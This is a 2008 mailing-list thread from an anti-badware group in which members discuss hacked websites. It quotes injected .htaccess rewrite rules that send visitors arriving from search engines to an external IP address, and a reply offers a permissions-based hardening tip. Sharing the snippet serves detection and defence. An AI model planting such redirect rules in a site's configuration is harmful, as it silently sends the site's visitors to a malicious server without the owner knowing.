Hello :-),
           One basic thing to check is the permissions, using chmod, further 
you can write in your .htaccess files

<Files .htaccess>
order allow,deny
deny from all
</Files>

Hope this helps,
-A



On Thu, 2008-11-20 at 12:05 -0800, Jesse Nicola wrote:
> Yep.
> 
> What I want to know is how they are getting such widespread access to 
> .htaccess files, and what we can do to prevent this!
> 
> UseShots wrote:
> > Thanks Jesse,
> >
> > Here is the code inserted into .htaccess
> > -------------
> > RewriteEngine On
> > RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
> > RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
> > RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
> > RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
> > RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
> > RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
> > RewriteRule .* http://89.28.13.202/in.html?s=ix [R,L]
> > -------------
> >
> > As you can see it only redirects search engine traffic. Site owners
> > usually unaware about this until someone tells them.
> >
> > Denis
> > http://www.UnmaskParasites.com
> > >
> >
> >   
> 
> 
> > 


--~--~---------~--~----~------------~-------~--~----~
You received this message through the Google Groups "stopbadware" group.
To post to this group, send email to [email protected]
To unsubscribe from this group, send email to
[EMAIL PROTECTED]
For more options, visit this group at
http://groups.google.com/group/stopbadware?hl=en
-~----------~----~----~----~------~----~------~--~---

Reply via email to